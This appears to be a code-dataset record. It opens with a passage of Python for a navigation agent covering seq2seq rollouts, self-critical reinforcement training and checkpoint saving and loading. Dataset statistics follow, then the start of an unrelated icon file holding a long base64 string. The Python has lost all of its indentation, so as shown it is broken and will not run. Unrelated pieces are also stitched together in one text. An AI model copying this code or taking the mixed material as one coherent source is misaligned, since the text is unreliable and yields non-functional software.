a_t_prev, u_t_prev = None, None # different action space
if self.decoder.action_space == -1:
u_t_prev = self.decoder.u_begin.expand(batch_size, -1)
else:
a_t_prev = Variable(torch.ones(batch_size).long() * self.model_actions.index('<start>'), requires_grad=False).to(device)
ended = np.array([False] * batch_size) # Indices match permutation of the model, not env
# Do a sequence rollout and calculate the loss
self.loss = 0
self.loss_ctrl_f = 0
env_action = [None] * batch_size
# for plot
#all_alpha = []
action_scores = np.zeros((batch_size,))
for t in range(self.episode_len):
f_t = self._feature_variable(perm_obs)
# Image features from obs
if self.decoder.panoramic: f_t_all, f_t = f_t
else: f_t_all = np.zeros((batch_size, 1))
# Action feature from obs
if self.decoder.action_space == 6:
u_t_features, is_valid = np.zeros((batch_size, 1)), None
else:
u_t_features, is_valid, _ = self._action_variable(perm_obs)
# Supervised training
target = self._teacher_action(perm_obs, ended)
ctx, en_ht, en_ct, vl_mask = self.encoder(seq, seq_mask, seq_lengths, f_t_all=f_t_all)
if t == 0: # use encoder's ht and ct as init
de_ht, de_ct, alpha, logit, pred_f = self.decoder(a_t_prev, u_t_prev, u_t_features, f_t, f_t_all, en_ht, en_ct, ctx, vl_mask)
else: # otherwise unroll as lstm
de_ht, de_ct, alpha, logit, pred_f = self.decoder(a_t_prev, u_t_prev, u_t_features, f_t, f_t_all, de_ht, de_ct, ctx, vl_mask)
# all_alpha.append(alpha)
# Mask outputs where agent can't move forward
if self.decoder.action_space == 6:
for i,ob in enumerate(perm_obs):
if len(ob['navigableLocations']) <= 1:
logit[i, self.model_actions.index('forward')] = -float('inf')
else:
logit[is_valid == 0] = -float('inf')
# if self.decoder.ctrl_feature:
# pred_f[is_valid == 0] = 0
if self.temp_alpha != 0: # add temperature
logit = logit/self.temp_alpha
self.loss += self.criterion(logit, target)
# Auxiliary training
if self.decoder.ctrl_feature:
target_f = self._teacher_feature(perm_obs, ended)#, is_valid.shape[-1])
self.loss_ctrl_f += self.aux_ratio * self.criterion_ctrl_f(pred_f, target_f)
# todo: add auxiliary tasks to sc-rl training?
# Determine next model inputs
# scheduled sampling
if self.schedule_ratio >= 0 and self.schedule_ratio <= 1:
sample_feedback = random.choices(['sample', 'teacher'], [self.schedule_ratio, 1 - self.schedule_ratio], k=1)[0] # schedule sampling
if self.feedback != 'argmax': # ignore test case
self.feedback = sample_feedback
a_t = self.get_next(self.feedback, target, logit)
# setting A
if self.testing_settingA:
log_probs = F.log_softmax(logit, dim=1).data
action_score = log_probs[torch.arange(batch_size), a_t].cpu().data.numpy()
# log_probs = F.log_softmax(logit, dim=1).data
# action_score = log_probs[torch.arange(batch_size), a_t].cpu().data.numpy()
a_t_prev = a_t
if self.decoder.action_space != 6: # update the previous action
u_t_prev = u_t_features[np.arange(batch_size), a_t, :].detach()
# Update the 'ended' list and build the environment action
for i,idx in enumerate(perm_idx):
action_idx = a_t[i].item()
if self.decoder.action_space == 6:
if action_idx == self.model_actions.index('<end>'):
# # sub_stages[idx] = max(sub_stages[idx]-1, 0)
# # ended[i] = (sub_stages[idx]==0)
ended[i] = True
env_action[idx] = self.env_actions[action_idx]
else:
if action_idx == 0:
# # sub_stages[idx] = max(sub_stages[idx] - 1, 0)
# # ended[i] = (sub_stages[idx] == 0)
ended[i] = True
env_action[idx] = action_idx
# state transitions
new_states = self.env.step(env_action, obs)
obs = np.array(self.env._get_obs(new_states))
#obs = np.array(self.env._get_obs(self.env.step(env_action, obs))) # , sub_stages
perm_obs = obs[perm_idx]
# Save trajectory output
for i,ob in enumerate(perm_obs):
if not ended[i]:
traj[i]['path'].append((ob['viewpoint'], ob['heading'], ob['elevation']))
for i,idx in enumerate(perm_idx):
action_idx = a_t[i].item()
if self.testing_settingA:
if not ended[i]:
action_scores[idx] = action_scores[idx] + action_score[i]
if self.decoder.action_space == 6:
if action_idx == self.model_actions.index('<end>'):
ended[i] = True
else:
if action_idx == 0:
ended[i] = True
# for i,idx in enumerate(perm_idx):
# action_idx = a_t[i].item()
# # if not ended[i]:
# # action_scores[idx] = action_scores[idx] + action_score[i]
# if self.decoder.action_space == 6:
# if action_idx == self.model_actions.index('<end>'):
# ended[i] = True
# else:
# if action_idx == 0:
# ended[i] = True
# Early exit if all ended
if ended.all(): break
# episode_len is a constant, so normalising the loss by it would only rescale it uniformly
self.losses.append(self.loss.item()) # / self.episode_len)
if self.decoder.ctrl_feature:
self.losses_ctrl_f.append(self.loss_ctrl_f.item()) # / self.episode_len)
# with open('preprocess/alpha.pkl', 'wb') as alpha_f: # TODO: remove for release!!!!
# pickle.dump(all_alpha, alpha_f)
# choose one of the three trajectories according to its probability
# for t,p in zip(traj, action_scores):
#     t['prob'] = p
if self.testing_settingA:
for t, p in zip(traj, action_scores):
t['prob'] = p
return traj
def test(self, use_dropout=False, feedback='argmax', allow_cheat=False, beam_size=1, successors=1, speaker=(None,None,None,None)):
''' Evaluate once on each instruction in the current environment '''
if not allow_cheat: # teacher feedback is permitted only for computing validation loss
assert feedback in ['argmax', 'sample'] # no cheating by using teacher at test time!
self.feedback = feedback
if use_dropout:
self.encoder.train()
self.decoder.train()
else:
self.encoder.eval()
self.decoder.eval()
super(Seq2SeqAgent, self).test(beam_size, successors, speaker)
def train(self, encoder_optimizer, decoder_optimizer, n_iters, aux_n_iter, feedback='teacher'):
''' Train for a given number of iterations '''
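# Every aux_n_iter-th iteration backpropagates only the auxiliary feature-prediction loss;
# all other iterations backpropagate the main action-prediction loss.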
assert feedback in self.feedback_options
self.feedback = feedback
self.encoder.train()
self.decoder.train()
self.losses = []
self.losses_ctrl_f = []
epo_inc = 0
for iter in range(1, n_iters + 1):
encoder_optimizer.zero_grad()
decoder_optimizer.zero_grad()
self.rollout()
if (not self.decoder.ctrl_feature) or (iter % aux_n_iter):
self.loss.backward()
else:
self.loss_ctrl_f.backward()
if self.clip_gradient != 0: # clip gradient
clip_gradient(encoder_optimizer, self.clip_gradient)
clip_gradient(decoder_optimizer, self.clip_gradient)
if self.clip_gradient_norm > 0: # clip gradient norm
torch.nn.utils.clip_grad_norm_(self.encoder.parameters(), self.clip_gradient_norm)
torch.nn.utils.clip_grad_norm_(self.decoder.parameters(), self.clip_gradient_norm)
encoder_optimizer.step()
decoder_optimizer.step()
epo_inc += self.env.epo_inc
return epo_inc
def rollout_notrain(self, n_iters): # jolin
epo_inc = 0
for iter in range(1, n_iters + 1):
self.env._next_minibatch(False)
epo_inc += self.env.epo_inc
return epo_inc
def rl_rollout(self, obs, perm_obs, seq, seq_mask, seq_lengths, perm_idx, feedback,
encoder, decoder):
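# Rollout used for self-critical training. feedback='sample1' samples actions from the
# policy and records per-step log-probabilities (seqLogprobs) and a validity mask;
# feedback='argmax1' decodes greedily and returns no log-probabilities. Returns the
# trajectories plus a dict mapping instr_id -> path for scoring.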
batch_size = len(perm_obs)
# Record starting point
traj = [{'instr_id': ob['instr_id'],
'path': [(ob['viewpoint'], ob['heading'], ob['elevation'])]
} for ob in perm_obs]
# Forward through encoder, giving initial hidden state and memory cell for decoder
ctx, h_t, c_t, seq_mask = encoder(seq, seq_mask, seq_lengths)
if not self.decoder_init:
h_t, c_t = torch.zeros_like(h_t), torch.zeros_like(c_t)
# Initial action
a_t_prev, u_t_prev = None, None # different action space
if decoder.action_space==-1:
u_t_prev = decoder.u_begin.expand(batch_size, -1)
else:
a_t_prev = Variable(torch.ones(batch_size).long() *
self.model_actions.index('<start>'), requires_grad=False).to(device)
ended=np.array([False] * batch_size)
# Do a sequence rollout but do not accumulate the supervised loss; the policy-gradient loss is computed later
# self.loss = 0
env_action = [None] * batch_size
# Initialize seq log probs for policy gradient
if feedback == 'sample1':
seqLogprobs = h_t.new_zeros(batch_size, self.episode_len)
mask = np.ones((batch_size, self.episode_len))
elif feedback == 'argmax1':
seqLogprobs, mask = None, None
else:
raise NotImplementedError('other feedback not supported.')
# auxiliary (feature-prediction) tasks are only implemented for supervised training
#assert (not self.decoder.ctrl_feature) # not implemented for RL rollouts
for t in range(self.episode_len):
f_t = self._feature_variable(perm_obs)
# Image features from obs
if decoder.panoramic: f_t_all, f_t = f_t
else: f_t_all = np.zeros((batch_size, 1))
# Action feature from obs
if decoder.action_space == 6:
u_t_features, is_valid = np.zeros((batch_size, 1)), None
else:
u_t_features, is_valid, _ = self._action_variable(perm_obs)
# Decoding actions
h_t, c_t, alpha, logit, pred_f = decoder(a_t_prev, u_t_prev, u_t_features,
f_t, f_t_all, h_t, c_t, ctx, seq_mask)
# Mask outputs where agent can't move forward
if decoder.action_space == 6:
for i,ob in enumerate(perm_obs):
if len(ob['navigableLocations']) <= 1:
logit[i, self.model_actions.index('forward')] = -float('inf')
else: logit[is_valid == 0] = -float('inf')
# Supervised training
# target = self._teacher_action(perm_obs, ended)
# self.loss += self.criterion(logit, target)
# Determine next model inputs
if feedback == 'argmax1':
_, a_t = logit.max(1)
elif feedback == 'sample1':
logprobs = F.log_softmax(logit, dim=1)
probs = torch.exp(logprobs.data)
m = D.Categorical(probs)
a_t = m.sample() # sampling an action from model
sampleLogprobs = logprobs.gather(1, a_t.unsqueeze(1))
else:
sys.exit('invalid feedback method %s'%feedback)
# if self.decoder.panoramic:
# a_t_feature = all_a_t_features[np.arange(batch_size), a_t, :].detach()
# Update the 'ended' list and build the environment action
for i,idx in enumerate(perm_idx):
action_idx = a_t[i].item()
if decoder.action_space == 6:
if ended[i] and mask is not None:
mask[i, t] = 0
elif action_idx == self.model_actions.index('<end>'):
ended[i] = True
env_action[idx] = self.env_actions[action_idx]
else:
if ended[i] and mask is not None:
mask[i, t] = 0
elif action_idx == 0: ended[i] = True
env_action[idx] = action_idx
obs = np.array(self.env._get_obs(self.env.step(env_action, obs)))
perm_obs = obs[perm_idx]
# Save trajectory output
for i,ob in enumerate(perm_obs):
if not ended[i]:
traj[i]['path'].append((ob['viewpoint'],
ob['heading'], ob['elevation']))
if seqLogprobs is not None: # feedback == 'sample1'
seqLogprobs[:, t] = sampleLogprobs.view(-1)
# Early exit if all ended
if ended.all(): break
path_res = {}
for t in traj:
path_res[t['instr_id']] = t['path']
return traj, mask, seqLogprobs, path_res
def rl_train(self, train_Eval, encoder_optimizer, decoder_optimizer,
n_iters, sc_reward_scale, sc_discouted_immediate_r_scale, sc_length_scale):
''' jolin: self-critical finetuning'''
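# Self-critical sequence training: for each minibatch, draw a sampled rollout and a
# greedy baseline rollout on the same instructions, score both, and use the score
# difference as the reward in a REINFORCE-style loss (PG_reward_criterion).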
self.losses = []
epo_inc = 0
self.encoder.train()
self.decoder.train()
for iter in range(1, n_iters + 1): # n_iters=interval
encoder_optimizer.zero_grad()
decoder_optimizer.zero_grad()
# copy from self.rollout():
# one minibatch (100 instructions)
world_states = self.env.reset(False)
obs = np.array(self.env._get_obs(world_states))
epo_inc += self.env.epo_inc
# Reorder the language input for the encoder
seq, seq_mask, seq_lengths, perm_idx = self._sort_batch(obs)
perm_obs = obs[perm_idx]
gen_traj, mask, seqLogprobs, gen_results = self.rl_rollout(obs, perm_obs, seq, seq_mask,
seq_lengths, perm_idx, 'sample1',
self.encoder, self.decoder)
# jolin: get greedy decoding baseline
# Just like self.test(use_dropout=False, feedback='argmax').
# But we should not do env.reset_epoch(), because we do not
# test the whole split. So DON'T reuse test()!
world_states = self.env.reset_batch()
obs = np.array(self.env._get_obs(world_states))# for later 'sample' feedback batch
perm_obs = obs[perm_idx]
if self.monotonic:
encoder2, decoder2 = self.encoder2, self.decoder2
else:
self.encoder.eval()
self.decoder.eval()
encoder2, decoder2 = self.encoder, self.decoder
with torch.no_grad():
greedy_traj, _, _, greedy_res = self.rl_rollout(obs, perm_obs, seq, seq_mask,
seq_lengths, perm_idx, 'argmax1',
encoder2, decoder2)
if not self.monotonic:
self.encoder.train()
self.decoder.train()
# jolin: get self-critical reward
reward = self.get_self_critical_reward(gen_traj, train_Eval, gen_results, greedy_res, sc_reward_scale, sc_discouted_immediate_r_scale, sc_length_scale)
# jolin: RewardCriterion
self.loss = self.PG_reward_criterion(seqLogprobs, reward, mask)
self.losses.append(self.loss.item())
self.loss.backward()
#clip_gradient(encoder_optimizer)
#clip_gradient(decoder_optimizer)
if self.clip_gradient != 0: # clip gradient
clip_gradient(encoder_optimizer, self.clip_gradient)
clip_gradient(decoder_optimizer, self.clip_gradient)
if self.clip_gradient_norm > 0: # clip gradient norm
torch.nn.utils.clip_grad_norm_(self.encoder.parameters(), self.clip_gradient_norm)
torch.nn.utils.clip_grad_norm_(self.decoder.parameters(), self.clip_gradient_norm)
encoder_optimizer.step()
decoder_optimizer.step()
return epo_inc
def PG_reward_criterion(self, seqLogprobs, reward, mask):
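# Masked REINFORCE objective: loss = -sum(logprob * reward * mask) / sum(mask),
# i.e. the reward-weighted negative log-likelihood averaged over valid (non-ended) steps.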
# jolin: RewardCriterion
input = to_contiguous(seqLogprobs).view(-1)
reward = to_contiguous(torch.from_numpy(reward).float().to(device)).view(-1)
#mask = to_contiguous(torch.cat([mask.new(mask.size(0), 1).fill_(1), mask[:, :-1]], 1)).view(-1)
mask = to_contiguous(torch.from_numpy(mask).float().to(device)).view(-1)
output = - input * reward * mask
loss = torch.sum(output) / torch.sum(mask)
return loss
def get_self_critical_reward(self, traj, Eval, gen_results, greedy_res, sc_reward_scale, sc_discouted_immediate_r_scale, sc_length_scale):
# get self-critical reward
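# The reward is broadcast over all episode_len steps (or placed on the final step for the
# *_last variants). For example, with reward_func == 'sr_sc' every step of a sampled
# trajectory receives (success_of_sample - success_of_greedy) * sc_reward_scale, so the
# gradient favours samples that beat the greedy baseline.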
instr_id_order = [t['instr_id'] for t in traj]
gen_scores = Eval.score_batch(gen_results, instr_id_order)
greedy_scores = Eval.score_batch(greedy_res, instr_id_order)
# normal score
gen_hits = (np.array(gen_scores['nav_errors']) <= 3.0).astype(float)
greedy_hits = (np.array(greedy_scores['nav_errors']) <= 3.0).astype(float)
gen_lengths = (np.array(gen_scores['trajectory_lengths'])).astype(float)
# sr_sc
hits = gen_hits - greedy_hits
#reward = np.repeat(hits[:, np.newaxis], self.episode_len, 1)*sc_reward_scale
# spl
gen_spls = (np.array(gen_scores['spl'])).astype(float)
greedy_spls = (np.array(greedy_scores['spl'])).astype(float)
ave_steps = (np.array(gen_scores['trajectory_steps'])).sum()/float(len(instr_id_order))
steps = (np.array(gen_scores['trajectory_steps']) - self.episode_len).sum()
if self.reward_func == 'sr_sc':
reward = np.repeat(hits[:, np.newaxis], self.episode_len, 1)*sc_reward_scale
elif self.reward_func == 'spl':
reward = np.repeat(gen_spls[:, np.newaxis], self.episode_len, 1) * sc_reward_scale
elif self.reward_func == 'spl_sc':
# spl_sc
spl_sc = gen_spls - greedy_spls
reward = np.repeat(spl_sc[:, np.newaxis], self.episode_len, 1) * sc_reward_scale
elif self.reward_func == 'spl_last': # does not work
tj_steps = [s - 1 for s in gen_scores['trajectory_steps']] # tj_steps
reward = np.zeros((gen_spls.shape[0], self.episode_len), dtype=float)
reward[range(gen_spls.shape[0]), tj_steps] = gen_scores['spl']
elif self.reward_func == 'spl_last_sc':
tj_steps = [s - 1 for s in gen_scores['trajectory_steps']] # tj_steps
reward = np.zeros((gen_spls.shape[0], self.episode_len), dtype=float)
reward[range(gen_spls.shape[0]), tj_steps] = [x - y for x, y in zip(gen_scores['spl'], greedy_scores['spl'])]
elif self.reward_func == 'spl_psc': # test
tj_steps = [s - 1 for s in gen_scores['trajectory_steps']] # tj_steps
reward = np.full((gen_spls.shape[0], self.episode_len), -sc_length_scale, dtype=float) # penalty
reward[range(gen_spls.shape[0]), tj_steps] = gen_scores['spl']
# discounted immediate reward
if sc_discouted_immediate_r_scale>0:
discounted_r = discount_rewards(gen_scores['immediate_rewards'], self.episode_len) * sc_discouted_immediate_r_scale
reward = reward + discounted_r
# penalty for trajectory length
if sc_length_scale:
length_penalty = np.repeat(gen_lengths[:, np.newaxis], self.episode_len, 1)*sc_length_scale
reward = reward - length_penalty
return reward
def save(self, encoder_path, decoder_path):
''' Snapshot models '''
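# Saving is retried up to 10 times to tolerate transient filesystem errors; besides the
# model weights, the Python / torch / CUDA RNG states are written next to the decoder
# checkpoint so training can be resumed reproducibly.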
write_num = 0
while (write_num < 10):
try:
torch.save(self.encoder.state_dict(), encoder_path)
torch.save(self.decoder.state_dict(), decoder_path)
if torch.cuda.is_available():
torch.save(torch.cuda.random.get_rng_state(), decoder_path + '.rng.gpu')
torch.save(torch.random.get_rng_state(), decoder_path + '.rng')
with open(decoder_path + '.rng2', 'wb') as f:
pickle.dump(random.getstate(), f)
break
except:
write_num += 1
def delete(self, encoder_path, decoder_path):
''' Delete models '''
os.remove(encoder_path)
os.remove(decoder_path)
os.remove(decoder_path+'.rng.gpu')
os.remove(decoder_path+'.rng')
os.remove(decoder_path+'.rng2')
def load(self, encoder_path, decoder_path):
''' Loads parameters (but not training state) '''
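# RNG states saved alongside the decoder checkpoint are restored when present; if those
# files are missing, a warning is printed and loading continues with the current seeds.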
self.encoder.load_state_dict(torch.load(encoder_path, 'cuda:0' if torch.cuda.is_available() else 'cpu'))
self.decoder.load_state_dict(torch.load(decoder_path, 'cuda:0' if torch.cuda.is_available() else 'cpu'), strict=False)
self.encoder.to(device)
self.decoder.to(device)
if self.monotonic:
self.copy_seq2seq()
try:
with open(decoder_path+'.rng2','rb') as f:
random.setstate(pickle.load(f))
torch.random.set_rng_state(torch.load(decoder_path + '.rng'))
torch.cuda.random.set_rng_state(torch.load(decoder_path + '.rng.gpu'))
except FileNotFoundError:
print('Warning: failed to find random seed file')
def copy_seq2seq(self):
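# Keep frozen eval-mode copies of the encoder/decoder; rl_train uses them as the greedy
# baseline when self.monotonic is set, so the baseline does not shift while the main
# model is being updated.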
self.encoder2=copy.deepcopy(self.encoder)
self.decoder2=copy.deepcopy(self.decoder)
self.encoder2.eval()
self.decoder2.eval()
for param in self.encoder2.parameters():
param.requires_grad = False
for param in self.decoder2.parameters():
param.requires_grad = False
| 46.247555
| 225
| 0.573598
| 18,815
| 151,322
| 4.353973
| 0.036779
| 0.02041
| 0.011267
| 0.011816
| 0.933508
| 0.9276
| 0.923499
| 0.915637
| 0.911975
| 0.910413
| 0
| 0.007368
| 0.326436
| 151,322
| 3,271
| 226
| 46.261694
| 0.79636
| 0.154617
| 0
| 0.890249
| 0
| 0
| 0.033074
| 0
| 0
| 0
| 0
| 0.000917
| 0.023129
| 1
| 0.031293
| false
| 0
| 0.010431
| 0.002268
| 0.072109
| 0.003628
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c79cb908a9334fa7d27f59257a61b99895fc0fc4
| 90,228
|
py
|
Python
|
static/logo.py
|
DCTewi/EzLottery
|
184447b190d77716243c0516469ab683ee8e0629
|
[
"MIT"
] | 1
|
2020-05-06T10:27:13.000Z
|
2020-05-06T10:27:13.000Z
|
static/logo.py
|
DCTewi/Md5Checker
|
ae536f41a5b96cb6d45170370252abbbd6d84729
|
[
"MIT"
] | null | null | null |
static/logo.py
|
DCTewi/Md5Checker
|
ae536f41a5b96cb6d45170370252abbbd6d84729
|
[
"MIT"
] | null | null | null |
"""
Icon Base64
"""
icon = b'AAABAAEAgIAAAAEAIAAoCAEAFgAAACgAAACAAAAAAAEAAAEAIAAAAAAAAAABAMMOAADDDgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA